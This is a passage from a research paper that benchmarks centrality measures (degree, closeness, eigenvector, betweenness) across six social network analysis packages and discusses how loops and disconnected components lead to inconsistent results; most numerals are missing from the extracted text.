tions. optimal consistency is invariant to scale and magnitude differences in raw centrality values. if the correlation fell be- low . , then there was suggestive evi- dence that these measures lacked consen- sus across software. scatterplots offer additional insight for comparing similar measures that em- ploy different scales. if any nodes are of particular interest to the analyst then poten- tial variations in their measurement may become very important. deviations in the measurement of a small number of nodes within a large network could still occur within the correlation threshold that we se- lected. scatterplots were therefore used to identify or characterize variation in meas- urement and assess whether such variation, if present, is a singular anomaly (e.g., dif- ferences in floating point) or appear to be deviations that are patterned (i.e., errors that arise from differences in the assump- tions behind how a measure should be cal- culated). datasets network data (graphs) of variable size and modality were generated to compare cen- trality measures across software packages. undirected one-mode [small (n= ) and a moderately large (n= )] and two-mode [small (n = , n = ) and a moderately large (n = , n = )] network datasets were generated. initially, both the one- mode, and two-mode networks contained smaller disconnected components (e.g., isolates and/or other small components) in addition to a large main component (table ). one-mode networks also contained loops. new networks were created by re- moving loops, removing smaller compo- nents, or both, from the initial network in order to model a variety of conditions. this resulted in twelve networks: both large and small networks that contain either loops, or disconnected components, or both, or nei- ther; as appropriate for one- or two-mode networks. each dataset was designed to be well within the data handling limits of each of the software packages that we evaluat- ed. 
most of the programs tested were lim- ited mainly by concerns such as network density and size, in addition to the proces- sor speed and the amount of available memory in a given computer. all are degree closeness betweenness eigenvector gephi raw normalized av- erage raw scaled (max= ) pajek raw normalized normalized normalized ucinet raw average raw normalized ora normalized normalized normalized normalized sna raw normalized raw normalized igraph raw normalized raw scaled (max= ) benchmarking and reliability issues connections insna.org | issues & | volume | table : data used for reliability comparisons capable of handling networks into the tens of thousands of nodes, with some capable of handling networks into the millions of nodes. centrality measures were calculat- ed using all six programs under a variety of conditions on all four networks, where ap- plicable. all graphs were undirected, with no multiple edges. these graphs were analyzed under multiple conditions: ) loops (edges that recursively link a node to itself), but no disconnected components present; ) disconnected components, but no loops present; ) loops and disconnect- ed components present; and ) a reference graph with no loops or disconnected com- ponents. for a more detailed description of the procedures used for each software pro- gram, see appendix . results our findings, presented in brief form in table , demonstrate that differences be- tween analytic programs exist on each measure, with the notable exception of betweenness centrality. results are pre- sented below by measure, and within each measure, by network condition. results are presented in a manner that highlights some of the most common or notable differences between programs. consistency was considered to be “high” when no notable loops were not considered to be a feature that is consistent with the definition of two-mode networks as consisting of two sets of nodes that have ties between but not within each node set. the two-mode networks were therefore not evaluated for network data with loops. difference arose, “medium” when the out- put from one or two software implementa- tions differed from others, and “low” when the output from more than two software implementations differed from others. for the sake of brevity, many of the cases where all programs demonstrated high consistency in the measures produced (“high” in table ) are not discussed but may be noted in the table below. for all measures, with the exception of eigenvec- tor, differences in output were generally more pronounced in smaller networks. data nodes in main component nodes in smaller components number of loops max. number of nodes average degree small one-mode . large one-mode . small two-mode ( , ) na ( , ) . large two-mode ( , ) na ( , ) . connections benchmarking and reliability issues | volume | issues & | insna.org table : consistency of output by centrality type and network conditions high = completely consistent, medium = one or two programs vary from the others, low = more than two programs offer unique results closeness centrality closeness centrality measures showed the least amount of measurement variability in ideal networks (i.e., no loops or discon- nected components), or in networks con- taining loops, but not in disconnected components. 
in networks containing no loops or disconnected components, plots indicated that calculations of closeness centrality were consistent between pajek, sna, igraph, ora, and ucinet; but only when ucinet was calculated using freeman ( ) normalization. ucinet and gephi also correspond when closeness measures in ucinet are report- ed as summed or averaged distances. in this condition, both ucinet and gephi produce output for freeman closeness with smaller values indicating shorter average distances from a particular node to all oth- ers in the graph (see negative correlation coefficients [small graph r = - . , large graph r = . ]). ucinet also offers an “average reciprocal distance” measure (ard) that corresponds more closely with other programs (small graph r = . , large graph r = . ). no disconnected components & no loops disconnected components loops disconnected components & loops mode mode mode mode mode mode mode mode between- ness cen- trality high high high high high na high na degree centrality high medi- um high medi- um low na low na eigenvec- tor cen- trality medium medi- um medi- um low medium na low na closeness centrality medium medi- um low low medium na low na benchmarking and reliability issues connections insna.org | issues & | volume | figure : scatterplot matrix comparing closeness centrality output for a large, two-mode network. pearson’s correlation coefficients between programs are provided above the diagonal. in two-mode networks, neither ucinet, nor gephi produced results that corresponded with other programs (figure ). ucinet, the only one of these pro- grams to include a closeness measure de- signed explicitly for use with two-mode data, produced a bifurcated plot in both large and small two-mode networks, though the effect is more pronounced in the larger networks (pictured, figure ). while the numeric values are different than those seen in degree centrality, the split- line pattern was similar to that observed in two-mode data without loops, but with dis- connected components included, and is at- tributable to ucinet’s distinctive treat- ment of two-mode output. networks that contain disconnected components, but no loops, resulted in the greatest disparities in closeness centrality measurements. although all software test- ed cited freeman as the reference for their centrality measure, only sna seemed to closely implement freeman’s ( ) ap- proach, and therefore produced no centrali- ty values when disconnected components were included in the graph, as expected under freeman’s approach. all other tested software generated closeness centrality values, as did sna when disconnected com- ponents were not present. although uci- net (as of version . ) no longer pro- vides a warning to the user that analyzing a disconnected graph with freeman’s close- connections benchmarking and reliability issues | volume | issues & | insna.org ness centrality measure is technically inap- propriate, it does require the user to select between options for handling the unde- fined distances offered by disconnected components. of the software that produced output under these conditions, values were disparate and only igraph and ora were consistent with one another. (figure ) in considering networks with both loops and disconnected components, there was a similar disparity of closeness cen- trality measures as seen in graphs with no loops, but with disconnected components. 
the same pairs of consistent and incon- sistent software values as seen in the graphs with disconnected components were observed with loops added to the data. figure : scatterplot matrix comparing output for closeness centrality in a small, one-mode network. pearson’s correlation coefficients between programs are provided above the diagonal. note that the sna package for r does not produce measures between disconnected components, resulting in correla- tion values listed as “na”. benchmarking and reliability issues connections insna.org | issues & | volume | degree centrality in networks with no loops, degree centrali- ty was consistent across software in one- mode networks, with the exception of ucinet. a similar pattern was observed for two-mode networks. for these two- mode data, ucinet values fell into two distinct groups in the plots contrasting ucinet with other software. the data are positively correlated, but some stratifica- tion is present. this pattern was similar for both large and small two-mode networks, though the effect is more pronounced in the larger networks (figure ). ucinet normalizes output for nodes in each mode individually, an aspect that differentiates it from other tested programs when handling two-mode data. such differences between ucinet and other programs are eliminat- ed if the network is converted to bipartite, to be analyzed as a one-mode network. the measurement of degree centrality was con- sistent among all programs in networks that contained disconnected components with no loops. figure : a variety of solutions are possible when analyzing two-mode networks in ucinet. top row: scatterplots of ucinet’s degree (r = . ) and closeness (r = - . ) output using the two- mode centrality procedure, compared with other analytic packages. all other packages performed identically. bottom row: when transformed into a bipartite network format, ucinet calculates as for a one-mode network, and results are analogous to other packages. closeness centrality for the bipartite aspect was calculated using freeman normalization in ucinet. connections benchmarking and reliability issues | volume | issues & | insna.org one-mode networks containing loops generated the greatest variability in measures of degree centrality across soft- ware (figure ). for both small and large networks with loops, calculations of degree that are made without modification of the data structure were consistent only be- tween ucinet and ora, between igraph and pajek, and between sna and gephi (see figure for an example in a small net- work). in networks with both loops and disconnected components, the patterns were essentially the same as those ob- served for one-mode networks with loops only. no other new patterns were apparent. the variations in output stem from how each program handles loops. program defaults counted single loops as two edges (pajek and igraph), loops as one edge (ucinet and ora), or ignored loops en- tirely under the default commands (gephi and sna). note that the two r packages (sna and igraph) differ in their default treatment of loops, with igraph defaulting to include loops and sna defaulting to ig- nore them in calculations. when the sna package was modified to include loops (di- ag = true) in the calculation of degree centrality, sna counted all loops as one edge and the output was consistent with that of ucinet and ora. gephi counted all loops as two arcs in a manner that was consistent with pajek and igraph. 
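the three defaults amount to counting a self-loop as two, one, or zero edges; which program defaults to which convention is summarized above, and the sketch below (assuming networkx, which itself counts a loop as two) only illustrates that the conventions are simple transformations of one another:

```python
import networkx as nx

G = nx.Graph([("a", "b"), ("b", "c")])
G.add_edge("b", "b")                                   # one self-loop on b

self_loops = {u for u, _ in nx.selfloop_edges(G)}

# the same graph under the three loop-handling conventions described above
loop_counts_two = dict(G.degree())                                               # loop adds 2
loop_counts_one = {v: d - (1 if v in self_loops else 0) for v, d in G.degree()}  # loop adds 1
loop_ignored    = {v: d - (2 if v in self_loops else 0) for v, d in G.degree()}  # loop ignored

print(loop_counts_two["b"], loop_counts_one["b"], loop_ignored["b"])   # 4, 3, 2
```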
figure : scatterplot matrix comparing degree centrality output for a small, one-mode network con- taining loops. pearson’s correlation coefficients between programs are provided above the diagonal. benchmarking and reliability issues connections insna.org | issues & | volume | eigenvector centrality eigenvector centrality was inconsistent across software packages and network types. in networks with no loops or dis- connected components, eigenvector cen- trality measures were inconsistent between gephi and other programs in moderately large, but not small one-mode networks. changing the default number of iterations in gephi’s eigenvector centrality measure from to , , greatly improved the consistency of measures between pro- grams; however, a small disparity remains for one-mode networks (r = . ). in two-mode networks, igraph, ora, gephi, and pajek’s “ -mode im- portant vertices” function produced results that were largely consistent with uci- net’s two-mode eigenvector centrality (figure ). pajek’s “hubs and authorities” measure (designed for one-mode networks) and sna produced results that are consistent with one another (not shown). in large two-mode networks, however, the output from gephi was again characterized by some small disparities (figure ). figure : scatterplot matrix comparing eigenvector centrality output for a large, two-mode network. pearson’s correlation coefficients between programs are provided above the diagonal. pajek output for this plot was calculated using “important vertices”, a two-mode generalization of hubs and authorities. connections benchmarking and reliability issues | volume | issues & | insna.org networks containing loops, but lacking disconnected components resulted in additional variability in measures of ei- genvector centrality across software. as observed for degree centrality, the correla- tion between programs’ centrality values was high; however, a separate set of points forming a group off of the diagonal ap- peared. eigenvector centralities calculated in large, one-mode networks resulted in correspondence between ucinet, ora, igraph, and the “hubs and authorities” measure in pajek. the result was similar in small one-mode networks. a correspond- ence between sna (which defaults to ignor- ing loops) and gephi is also noted (figure ). the sna “evcent” function offers two additional options for calculating eigenvec- tor centrality. the sna evcent function with included loops (diag=true argument) yielded eigenvector scores correlated (r = . ) with all other software except for gephi results. however, when combining presence of loops with the more robust calculation of eigenvector centrality (di- ag=true, use.eigen=true) specified in the user manual, the outputted eigenvector is inversely correlated (sna : other packag- es, r = - . ; sna : gephi, r = - . ). the variability in eigenvector centrality scores was noted in large and small networks, but more pronounced in the former. figure : scatterplot matrix of eigenvector centrality output for a small, one-mode network with loops. pearson’s correlation coefficients between programs are provided above the diagonal. note, initial cal- culations in sna – shown above – were run using the default argument (diag=false). for additional variation, consult the text above. 
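the sensitivity of eigenvector centrality to loops can be reproduced directly from the adjacency matrix, since a self-loop is simply a non-zero diagonal entry; a hedged sketch using networkx and numpy rather than any of the tested packages:

```python
import numpy as np
import networkx as nx

G = nx.karate_club_graph()
G.add_edge(0, 0)                        # introduce a single self-loop

A = nx.to_numpy_array(G)                # the self-loop appears on the diagonal
A_no_loops = A.copy()
np.fill_diagonal(A_no_loops, 0)         # the "ignore loops" convention drops the diagonal

def principal_eigenvector(M):
    vals, vecs = np.linalg.eig(M)
    v = np.abs(vecs[:, np.argmax(vals.real)].real)
    return v / v.max()                  # scale so the maximum is 1, one of the scalings seen above

with_loops    = principal_eigenvector(A)
without_loops = principal_eigenvector(A_no_loops)
print(np.abs(with_loops - without_loops).max())   # non-zero: the loop shifts the scores
```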
benchmarking and reliability issues connections insna.org | issues & | volume | the igraph package produced eigenvector output that differed slightly from other programs in networks that contain discon- nected components, but no loops (small networks r = . ). the disparity was much less pronounced in large networks (r = . ). the above patterns of inconsisten- cies in calculating eigenvector centrality persisted in networks with both loops and disconnected components. in small net- works of this type, pajek, ucinet, and ora produced measures that were con- sistent with one another. similarly, sna and gephi also produced nearly identical out- put in small networks with both loops and disconnected components. in larger net- works, however, the similarities between sna and gephi diminished. only pajek, ucinet, and ora were highly consistent (see figure ). figure : scatterplot matrix comparing eigenvector centrality output for a moderately large, one-mode network containing loops and disconnected components. pearson’s correlation coefficients between programs are provided above the diagonal. betweenness centrality measurement of betweenness centrality was virtually unaffected by the various network conditions being evaluated (i.e., loops, disconnected components). measures were consistent for each of the tested packages, on every dataset (see fig- ure for an example). the one, very slight, exception was in ucinet’s two- mode measures. ucinet differed slightly from other programs in measuring be- tweenness in the small two-mode network connections benchmarking and reliability issues | volume | issues & | insna.org (r = . , accompanied by slight jitter in scatterplots – not shown). however, no dif- ferences were apparent if the same network was converted to bipartite and the one- mode variation of the betweenness meas- ure was used instead. for more examples of the differences between ucinet’s two- mode measures and other programs’ ap- proaches to two-mode networks, see fig- ure . figure : scatterplot matrix comparing betweenness centrality output for a large, one-mode network. pearson’s correlation coefficients between programs are provided above the diagonal. benchmarking and reliability issues connections insna.org | issues & | volume | discussion this study was designed to examine basic reliability concerns among a selection of popular tools in use within the social net- work analysis community. specifically, we investigated whether some popular soft- ware packages were producing equivalent results. we found variability that brings to light disagreement, sometimes substantial, over how four concepts of node centrality should be measured. the programs under consideration were only able to produce the same output under a very narrow set of conditions. disagreements over aspects of how these measures should be operational- ized manifested as networks departed from the ideal reference graphs that contained no loops or disconnected components. such variability precludes the ability to seamlessly port data and/or exchange measures between programs and makes it essential for the user to have access to evaluations that highlight differences be- tween the default, and available, options for various measures when using two or more programs in concert. 
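the kind of evaluation called for here can be approximated cheaply: compute what two implementations (or two option settings) each call the same measure and inspect their agreement, much as the scatterplot matrices above do; a minimal sketch using two closeness variants available in networkx:

```python
import numpy as np
import networkx as nx

G = nx.les_miserables_graph()            # a convenient built-in co-occurrence network
nodes = list(G)

classic  = nx.closeness_centrality(G)    # freeman-style closeness
harmonic = nx.harmonic_centrality(G)     # a variant designed to tolerate disconnected data

x = np.array([classic[v] for v in nodes])
y = np.array([harmonic[v] for v in nodes])
print(round(float(np.corrcoef(x, y)[0, 1]), 3))   # pearson's r, as reported above the diagonals
```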
within the so- cial network analysis community, the dif- fering assumptions behind the various measurement variations unnecessarily cloud communication between users of dif- ferent programs and leave enough doubt in the minds of new entrants as to whether the community has unified its language. be- low, we discuss in greater detail our inter- pretation of the results, the implications of our findings for the average user, and the implications for the social network analy- sis community. general findings by employing hierarchical subsets of net- work conditions, we isolated measure dif- ferences under specific conditions. the use of varying network conditions was intend- ed to better reflect a range of network data that are likely to be encountered. condi- tions in the undirected networks ranged from the “ideal” of reference data – no loops or disconnected components – to scenarios commonly encountered when analyzing social networks, namely, loops, disconnected components, and the combi- nation of the two. in general, centrality measures for reference graphs – those with no loops or disconnected components – were largely consistent. this may be taken to imply that programs are implementing the same – or very similar – algorithms for the offered measures, albeit mainly in the absence of issues that may complicate calculation, such as loops and disconnected compo- nents. a notable inconsistency did, how- ever, arise in the analysis of the two-mode reference networks. of the tested software, only ucinet offered measures tailored specifically for two-mode networks. cor- respondingly, analytic results reveal a bi- furcated pattern when comparing calcula- tions of degree and closeness in ucinet to those of other software packages, along with slight differences in betweenness measures in small two-mode networks. no other programs demonstrated a pattern that corresponded to that of ucinet when measuring degree, closeness, or between- ness. when measuring eigenvector central- ity, however, three additional programs (igraph, ora, and gephi) evince a bifur- cated pattern that corresponds very closely with ucinet. (figure ) connections benchmarking and reliability issues | volume | issues & | insna.org figure : scatterplot matrices comparing degree and eigenvector output for a two-mode network. nei- ther network contains loops or disconnected components. pearson’s correlation coefficients between programs are provided above the diagonal. there was a surprising amount of inconsistency in the most basic measure: degree centrality. programs’ definitions identified degree centrality as either the number of neighbors adjacent to a node, or the number of edges incident upon a node. however, many programs did not provide a citation for this measure. among those that do, the freeman ( ) definition is employed, which does not account for a topological feature that is common in bio- logical, corporate, citation, and other net- works: self-referencing, or loops. freeman implements a variation on nieminen ( ), which accounts for the number or proportion of other nodes that are adjacent to a particular node, but not for nodes that are adjacent to themselves (i.e., loops). the evaluated programs defaulted to three dif- ferent methods for dealing with loops in a graph, revealing the variation in degree centrality calculations. 
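the bifurcated two-mode pattern is what one would expect when one program normalizes each mode against the size of the opposite node set while another normalizes against the whole graph; a toy sketch of the two conventions (an illustration of the general mechanism, assuming networkx's bipartite module, not a reimplementation of ucinet):

```python
import networkx as nx
from networkx.algorithms import bipartite

# a toy two-mode (affiliation) network: people attending events
people, events = ["ann", "bob", "cat"], ["e1", "e2"]
B = nx.Graph()
B.add_nodes_from(people, bipartite=0)
B.add_nodes_from(events, bipartite=1)
B.add_edges_from([("ann", "e1"), ("bob", "e1"), ("bob", "e2"), ("cat", "e2")])

raw       = dict(B.degree())                                              # raw counts
per_mode  = bipartite.degree_centrality(B, people)                        # normalized per mode
whole_net = {v: d / (B.number_of_nodes() - 1) for v, d in B.degree()}     # one-mode style normalization

print(raw["bob"], per_mode["bob"], whole_net["bob"])   # 2, 1.0, 0.5
```

the same raw degree lands at different normalized values in the two schemes, which is one mechanism behind the stratified plots shown in the figures.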
this disparity be- tween definitions of what constitutes a loop and how its effect should be measured in such a conceptually simple calculation suggests the need for the community of social network analysts to strengthen naming and meas- urement standards. such a process may re- duce error in interpretations resulting from what are actually different measures resid- ing under the same name. the problem of different measures residing under the same name is exempli- fied when considering eigenvector central- ity. although most programs identify this measure as eigenvector centrality, the presence of loops in a network reveals slight differences in how this measure is operationalized. in its essence, eigenvector centrality extends degree centrality by weighting each node’s score by its neigh- bors’ scores (bonacich ). like degree, it is affected by loops. five of the tested programs cite bonacich ( , or ) in calculations of this measure, and one – pa- jek – employs the analogous “hubs and au- thorities” (kleinberg ). as with de- gree centrality, the presence of loops in a network reveals which programs opera- tionalized this measure using the same or substantially similar assumptions. benchmarking and reliability issues connections insna.org | issues & | volume | three programs – ucinet, ora, and pa- jek – were consistent with one another in measuring eigenvector centrality in all three variations of one-mode networks. this is notable because one of those three, pajek, provides “hubs and authorities”, which generates two independently scaled measurement vectors, of which the authori- ties vector was consistent with eigenvector centrality in the other two programs. this is the one case where a centrality meas- urement that differed from the classic cita- tion was identified under a different name. perhaps the most conspicuous case of inconsistent calculations is closeness centrality in the presence of disconnected components. all programs evaluated refer- enced freeman’s ( ) measure, with the exception of pajek, which cites sabidussi ( ), as cited in freeman. however, it quickly becomes apparent that the question of how to operationalize closeness centrali- ty is neither agreed upon, nor settled in consideration of disconnected components. the original formula for closeness centrali- ty should not function with disconnected data since the distance between discon- nected components is undefined (freeman ). any means of dealing with discon- nected data, with the possible exception of running calculations only within each indi- vidual component, is therefore a later vari- ation of the freeman formulation. isolates and other disconnected components – which can be common network features in some areas – frequently present an obstacle to communicating the results of this meas- ure. a wide array of alternate measures has since been proposed to allow calculation of closeness with disconnected data (e.g., borgatti , dangalchev , opsahl , wei et al ). amid such prolifer- ation, however, it is unclear which forms have been incorporated in the software yielding results for disconnected compo- nent datasets. only the r package sna produced an error message without numerical results rather than closeness values as stipulated in freeman ( ), because it treats the dis- tances between disconnected components as infinite. there is also a stern admonish- ment in the package details against calcu- lating closeness centrality in networks with disconnected components. 
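written out, the freeman-style formulation makes the problem explicit: with n nodes, closeness divides by a sum of geodesic distances, and that sum is undefined as soon as some d(v, u) is infinite because u lies in another component.

```latex
C_C(v) = \frac{n - 1}{\sum_{u \neq v} d(v, u)}
```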
all other soft- ware produced closeness calculations without requiring that smaller components first be removed. the analysis of disconnected net- works using closeness produced widely varied output. correspondingly, all tested software provided some means for dealing with disconnected components. in most software, the method for defining the dis- tance between disconnected components was incorporated into the measure. ora and the r package igraph appear to default to substituting the number of nodes for un- defined distances, whereas gephi appears to report undefined distances as zero and omit disconnected nodes from calculation. pajek sets undefined distances to zero and calculates closeness only within each com- ponent. of the software tested, ucinet of- fers the most options for applying close- ness centrality to one-mode networks with disconnected components. the user may choose one of four options for dealing with the distances between disconnected com- ponents: ( ) substitute the number of nodes in the graph for the undefined distance; ( ) substitute the maximum distance, plus one (the default setting); ( ) treat undefined distances as missing and assign no value to isolates; and ( ) set undefined distances to zero and calculate closeness only within each component. those four options, com- bined with three options for scaling output (summed distances, averaged distances, and freeman normalization) present the user with combinations of options for calculating closeness in cases with discon- nected components. aside from differences in how out- put was scaled, there was essentially no variation in calculating betweenness cen- trality. this is perhaps unsurprising, as there is little room for interpretation in the definition of this measure. betweenness, a the option of treating undefined distances as missing is scaled in only one manner. connections benchmarking and reliability issues | volume | issues & | insna.org normalized count of the number of times that a node appears on the shortest path be- tween any two other nodes (freeman ), will generally be unaffected by dis- connected components and loops since loops will not create new geodesics (short- est paths) and the absence of paths be- tween disconnected components does not complicate geodesic counts. it bears repeating that the programs tested displayed relatively little variation when analyzing reference graphs – those with neither loops, nor disconnected com- ponents. the variation that was present in the centrality output from the reference graphs appears more likely to have arisen from differences in opinion on preferred methods of calculation in situations that vary from the ideal of connected one-mode graphs with non-recursive edges. implications for the field user the reference graphs make it clear that – with only a few exceptions – those respon- sible for developing and maintaining each of these programs have done an admirable job of benchmarking their programs against others and correcting unintentional software differences. however, network topology that diverges away from the “ide- al” reference graph reveals that there is a great deal of disparity in the analytic as- sumptions that are built into software used to calculate such measures. the problem that arises from this lack of understanding and agreement within the social network analysis community is that it puts both analysts and the field itself at a disad- vantage by introducing unnecessary noise into analyses and communication within the community. 
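the families of options described above (substitute the number of nodes, substitute the maximum observed distance plus one, restrict the calculation to each component, or leave the value undefined) are easy to express side by side; a sketch of the general idea, assuming networkx, and not a reimplementation of any particular package's menu:

```python
import math
import networkx as nx

def closeness_with_rule(G, rule="max_plus_one"):
    """closeness on a possibly disconnected graph, parameterized by the rule used
    for undefined (infinite) distances."""
    n = G.number_of_nodes()
    scores = {}
    for v in G:
        dists = nx.single_source_shortest_path_length(G, v)
        reach = [d for u, d in dists.items() if u != v]    # distances to reachable nodes only
        missing = (n - 1) - len(reach)                      # nodes v cannot reach
        if rule == "within_component":                      # score each node within its own component
            scores[v] = len(reach) / sum(reach) if reach else 0.0
        elif rule == "missing":                             # leave the value undefined instead
            scores[v] = math.nan if missing else (n - 1) / sum(reach)
        else:                                               # substitute something for undefined distances
            sub = n if rule == "n_substitute" else max(reach, default=0) + 1
            scores[v] = (n - 1) / (sum(reach) + missing * sub)
    return scores

G = nx.Graph([(1, 2), (2, 3), (4, 5)])                      # two components
for rule in ("n_substitute", "max_plus_one", "within_component", "missing"):
    print(rule, closeness_with_rule(G, rule))
```

even on this five-node toy graph the four rules give clearly different values for the same nodes, which is the disparity described above, only in miniature.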
certainly, for those analysts whose data are similar to our reference graphs (i.e., no loops, no isolates or other discon- nected components) the low variability in measurement definition and implementa- tion is good news. the lack of variation in the output for the four reference graphs in- dicates that the programs used in this study agree in their standards for the calculation of basic centrality measures under the most basic and favorable conditions. the differ- ences that resulted from other conditions, however, underscore the importance of an analyst’s familiarity with their choice of software, and the software used by those whose work they wish to use as an analytic benchmark. a good deal of care should be exercised to verify the precise method of calculation being applied and the settings – and defaults – that were employed for those calculations. centrality measures typically form the foundation of an analysis and if their implementation varies, more complex al- gorithms that involve one or more of these centrality measures may be producing measures or results that magnify this vari- ability. unfortunately, the variation in the measurement of centrality values between programs remains somewhat opaque. measurement disparities were observed even when the terms and citations used to identify the measures were identical be- tween programs. clearly, analyzing the same net- work in the same way, using different software, can produce divergent results. if the implementation of a given centrality measure differs from one program to an- other, they are at best two different variants of the same measure. if such is the case, it will aid the analyst to know which variant they are utilizing. with its variety of measures and selections, ucinet goes the furthest of all the software tested above in identifying which variant of a particular measure it is employing – naming particu- lar variants of the same measure according to its originator or an intuitive description of its function. only a few of the tested an- alytic tools were consistently explicit about the equations used to produce all four measures. the clarity in communication that has characterized the development of methods in the field of social network analysis is less evident in software opera- tionalization. this presents a threat to the validity of how those measures are em- ployed. definitional differences between programs exist and are not readily apparent benchmarking and reliability issues connections insna.org | issues & | volume | to the average user. although variations in centrality calculations hold the potential to increase the validity of a particular meas- ure when applied in the appropriate con- text, such differences are frequently masked from the general user, resulting in increased potential for the misapplication of measures. the present research has highlight- ed the value of knowing what one is get- ting into when considering new analytic software, and the importance of thoroughly vetting the topology of the network being analyzed. add to that the tendency for most software packages to have some pro- vision for porting data and/or measures be- tween packages. the detected disparity in measures available in the current analytic packages indicates that such practices should be undertaken with caution – espe- cially in cases where graphs contain loops, isolates, or disconnected components. 
if the basic measures differ between packag- es then it may be inadvisable to use the two packages together in an analysis that involves those measures. implications for the social network analy- sis community the lack of consensus over how to opera- tionalize the most common node centrality measures suggests some ontological varia- bility within the social network analysis community. disagreements over how vari- ous centrality measures should be opera- tionalized would not be troubling if they were apparent to the user. but the differ- ences highlighted above are far from clear to the average user. lack of agreement over how to operationalize a measure is masked when a variety of approaches share a single name. the situation is exacerbated when software documentation does not clarify precisely which approach has been implemented. the debate over how various net- work measures should be calculated is rich, and as old as the field itself. the community’s openness to new variations on established methods provides flexibility and a healthy diversity of analytic options. however, the advantages of such wealth are substantially diminished when the same measure is operationalized different- ly in each analytic package. although a shared lexicon of terms and concepts exists within the social network analysis commu- nity, those terms and concepts are only generally – and not explicitly – applied. the programs used to perform social net- work analysis are disparate enough to cre- ate idiosyncratic analytic results. the interfaces of each analytic package vary greatly and do not always de- fault to the most commonly used variants of each measure. without equivalence of measurement assumptions and nomencla- ture between programs that is easily acces- sible, the assumption of equivalence and portability of centrality measures in net- work analysis is lacking. this increased variability of centrality results may poten- tially affect more complex algorithms that incorporate these basic measures. these basic differences could be resolved with agreed-upon defaults and naming conven- tions for variants of a particular measure or algorithm. it is important that the variants of each measure be identified as distinct vari- ations of a centrality – or other measure- ment – theme. it is not enough to identify a measure generally as “closeness centrality” if it varies from the basic measure identi- fied by freeman (or sabidussi) – which most all do. instead, the measure should be explicitly identified as a particular variant in order to better emphasize its unique at- tributes and trade-offs. explicit descriptions of measurements can be essential to proper analysis. to draw an example from another analytic field: post-hoc tests for pairwise compari- sons of means following analysis of vari- ance have been developed to address varia- tions in hypothesis testing, trade-offs be- tween power and error, unequal sample sizes, and unequal variances (for a discus- sion of post-hoc tests see kirk ). although the more casual user may find such a selection daunting, the strength in connections benchmarking and reliability issues | volume | issues & | insna.org this diversity of options is that the user may better consider and tailor their analyt- ic selections. additionally – and perhaps more importantly – small differences be- tween variations on a measure become a feature, rather than an obstacle, when a particular form of a measurement is explic- itly named. naming conventions are important. 
if a measure or algorithm differs from oth- ers in order to address some given scenario or feature of network topology, then it bears unique attributes that more often than not constitute a trade-off at some level. it is far better for both the analyst and the community for these differences to become less opaque. of the tested programs, uci- net appears to have gone the furthest in giving attribution to the different variants of each measure. though, both r packages benefit from the explicit nature of specify- ing a measurement. this aids the analyst by further clarifying differences between analytic approaches. the community is aided in establishing reliability of meas- urements between programs; as such clari- ty makes it much easier to directly com- pare results from different programs. it is not necessary for each program to offer every available option – though several have clearly taken steps in that di- rection. it is likely to be much more help- ful to the social network analysis commu- nity at large if the measures and algorithms that a program offers are fully identified for appropriate application of their proper- ties. proper identification will simplify dis- course and improve the communication of methods. such improvements in communi- cation within the field also translate into increases in measurement validity when a measure is identified as a specific variant, rather than just belonging to a general cat- egory or class of measures. lastly, it should be noted that a lack of agreement from within the commu- nity on something as fundamental as nam- ing conventions hints at an arbitrariness that is surprising given the care and rigor of those who have established and expand- ed the field of social network analysis. freeman ( , ) has repeatedly made a compelling case for clarity and precision in communication – as facilitated by math- ematical notation – being the factor that set social network analysis apart from similar fields that rely more on natural language for clarification. the benefits of such pre- cision are, however, often frustratingly be- yond the reach of those using social net- work analysis software. further, as researchers from other fields continue to adapt and adopt social network analytic methods, the use of standard, specific terms on the available analytic options provides a clarity that aids newcomers to social network analysis in seeing how their field can benefit by adopting a network analytic approach. but the converse is not the case: imprecise def- initions need not constitute an invitation for some within the “hard sciences” to forego established network analysis meth- ods in favor of feigning to invent them for themselves. although co-option will likely continue, there has been an increase in the number of new entrants to social network analysis who give proper attribution (freeman ). clarity of communication will reinforce social network analysis as a mature and growing field, and de- emphasize the perception of it as being a general perspective or a mere category of tools (knoke and yang , snowden ). in most cases, it is possible to force the centrality output for a network contain- ing loops or disconnected components to be relatively consistent across all six plat- forms employed above. but such actions frequently require transformations or other preprocessing in order to do so, and those steps are seldom stipulated since there is no real agreed-upon definition of exactly which mathematical approach constitutes each type of centrality. 
the clarity that comes with definitional consistency be- tween programs is what we feel to be needed. we advocate the clarity that comes with dissimilar means to a particular end being clearly identified up front. benchmarking and reliability issues connections insna.org | issues & | volume | the “correct” measure is the one that is best suited to handle the idiosyncra- sies of the data an analyst holds. for the analyst to make this assessment, they first need to know the topology of the network they are analyzing; and next, specifically how a measure is meant to operate, and its underlying assumptions. a more complete approach includes asking which variation of the measure is available, the strengths and limitations of that version, and how re- liably one or more programs produce accu- rate measures. we have identified program and inter-program reliability issues under varied conditions. similar comparisons be- tween other programs and under different conditions are strongly recommended when weighing whether to use two or more analytic programs in conjunction with one another. further evaluations of inter- program reliability will benefit from add- ing more types of variation: e.g., directed graphs, density variations, clusterability variations. ongoing research in this topic will continue to be important as new en- trants continue to discover the scalability and utility of the tools and concepts of so- cial network analysis for deciphering in- creasingly diverse networks with complex topological features. references anderson, e., bai, z., bischof, c., blackford, s., demmel, j., dongarra, j., du croz, j., greenbaum, a., hammarling, s., mckenney, a., sorensen, d. ( ). lapack users' guide. ( rd ed.). phila- delphia, pa: siam. batagelj, v., mrvar, a. ( ). pajek – analysis and visualization of large networks. university of ljubljana, slovenia, eu. available at: http://pajek.imfm.si/doku.php?id=download bastian, m., heymann s., jacomy, m. ( ). gephi: an open source software for exploring and manipu- lating networks. international aaai conference on weblogs and social media. available at: https://gephi.org. becker, r.a., chambers, j.m., wilks, a.r., ( ). the new s language. pacific grove, ca: brooks/cole. bonacich, p. ( ). factoring and weighting ap- proaches to status scores and clique identification. journal of mathematical sociology, , – . bonacich, p. ( ). power and centrality: a family of measures. american journal of sociology, , – . borgatti, s.p., everett, m.g., freeman, l.c. ( ). ucinet for windows: software for social network analysis. analytic technologies, harvard, ma. available at: http://www.analytictech.com/ucinet.htm borgatti, s.p. ( ). identifying sets of key players in a network. computational, mathematical and or- ganizational theory, , – . butts, c.t. ( ). sna: tools for social network analysis. version . . irvine, ca. available at: http://erzuli.ss.uci.edu/r.stuff carley, k., reminga, j. ( ). ora: organization risk analyzer*. center for analysis of social and organizational systems, carnegie mellon univer- sity. pittsburgh, pa. available at: http://www.casos.cs.cmu.edu/projects/ora csardi, g., nepusz, t. ( ). the igraph software package for complex network research. interjour- nal, cambridge, ma, . available at: http://igraph.sourceforge.net. doreian, p. ( ). causality in social network analy- sis. sociological methods research, ( ), – . dangalchev 